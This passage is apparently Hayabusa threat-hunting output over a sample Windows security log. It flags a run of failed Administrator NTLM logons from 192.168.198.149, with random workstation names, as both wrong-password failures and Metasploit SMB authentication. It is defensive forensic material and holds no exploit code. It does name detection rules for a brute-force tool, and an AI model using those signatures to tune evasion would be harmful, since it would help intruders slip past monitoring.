Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 